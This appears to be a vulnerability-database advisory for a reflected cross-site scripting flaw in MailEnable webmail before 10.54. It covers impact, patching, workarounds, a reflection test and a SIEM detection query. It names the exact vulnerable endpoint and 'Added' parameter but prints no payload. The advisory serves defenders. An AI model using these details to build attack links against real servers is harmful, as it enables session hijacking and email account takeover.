Login Sign Up

CVE-2025-34408

6.1 MEDIUM
Cross-Site Scripting

📋 TL;DR

MailEnable versions before 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Added parameter of /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx. Attackers can craft malicious links that execute JavaScript in victims' browsers when clicked, potentially stealing cookies or redirecting users. This affects all MailEnable installations using vulnerable versions.

💻 Affected Systems

Products:
  • MailEnable
Versions: All versions prior to 10.54
Operating Systems: Windows
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the webmail interface component of MailEnable. Requires the webmail interface to be accessible.

📦 What is this software?

Mailenable by Mailenable

View all CVEs affecting Mailenable →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers steal authenticated session cookies, hijack user accounts, redirect to phishing sites, and perform actions as authenticated users including email manipulation.

🟠

Likely Case

Attackers steal non-HttpOnly session cookies to hijack authenticated sessions, potentially accessing email accounts and sensitive data.

🟢

If Mitigated

With HttpOnly cookies and proper input validation, impact reduces to limited HTML/CSS injection or temporary page defacement.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Reflected XSS vulnerabilities are commonly weaponized in phishing campaigns. No public proof-of-concept identified but exploitation is straightforward.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 10.54

Vendor Advisory: https://mailenable.com/Standard-ReleaseNotes.txt

Restart Required: Yes

Instructions:

1. Download MailEnable version 10.54 or later from the vendor website. 2. Run the installer to upgrade. 3. Restart MailEnable services. 4. Verify the version is 10.54 or higher.

🔧 Temporary Workarounds

Web Application Firewall (WAF) Rules

all

Implement WAF rules to block malicious XSS payloads in the Added parameter

Input Validation Filter

windows

Add input validation to sanitize the Added parameter before processing

🧯 If You Can't Patch

  • Implement strict Content Security Policy (CSP) headers to prevent script execution
  • Disable or restrict access to the vulnerable endpoint via firewall rules

🔍 How to Verify

Check if Vulnerable:

Access /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx?Added=test and check if input is reflected unsanitized in response

Check Version:

Check MailEnable version in administrative interface or program files version information

Verify Fix Applied:

After patching, test with XSS payloads in Added parameter and verify they are properly sanitized or blocked

📡 Detection & Monitoring

Log Indicators:

  • HTTP GET requests to AddRecipientsResult.aspx with suspicious Added parameter values containing script tags or JavaScript

Network Indicators:

  • Unusual traffic patterns to the vulnerable endpoint with encoded payloads

SIEM Query:

source="mailenable.log" AND uri="/Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx" AND query="*Added=*<script*"

📊 Metadata

CVE ID: CVE-2025-34408
CVSS v3 Score: 6.1 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
EPSS Score: 0.02% exploit probability (4.5th percentile)
Published: December 9, 2025
Last Updated: December 9, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-34408, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)